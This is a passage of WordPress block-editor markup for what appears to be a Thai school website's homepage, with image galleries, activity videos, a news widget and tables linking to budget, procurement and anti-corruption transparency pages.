"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 